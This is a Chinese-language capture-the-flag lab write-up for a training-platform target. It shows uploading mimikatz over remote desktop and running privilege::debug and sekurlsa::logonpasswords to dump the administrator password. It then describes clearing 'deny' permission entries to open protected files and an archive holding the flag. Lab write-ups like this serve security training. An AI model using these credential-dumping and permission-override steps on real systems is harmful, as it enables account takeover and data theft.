第七章、GET THE PASS!
阿新 • • 發佈:2021-12-20
第七章 GET THE PASS!
0x01. 明確目標
https://hack.zkaq.cn/battle/target?id=4eadc30136d08c33
既然是抓密碼 , 那你還想啥 , mimikatz.exe搞起來
0x02. 上傳mimikatz.exe
使用上一章新增管理員賬號 , 然後遠端桌面連線 , 然後上傳 mimikatz
具體步驟
第零條 : mimikatz.exe // 啟動工具
第一條:privilege::debug //提升許可權
第二條:sekurlsa::logonpassWords //抓取密碼
administrator密碼 :
wow!yougotit!
0x03. 獲得flag
得到administrator密碼 , 貌似不知道該幹嘛了 , 我們用administrator賬號遠端連線一下 嘿嘿 看看有什麼好玩的
好傢伙 , 嘿嘿 , 雙擊開啟試試
結果拒絕訪問 , 修改一下許可權
不單單要把Administrator的許可權修改 , 還要把Administrators的許可權也要修改一下 , 把拒絕一欄全部取消勾選
然後再次雙擊開啟 , 得到資訊
臥槽 , 預設壓縮包也是沒有許可權解壓的 , 按照之前的步驟 , 也是把拒絕一欄全部取消勾選 , 然後解壓 , 開啟
得到flag
FLAG{WOW!yougotit!}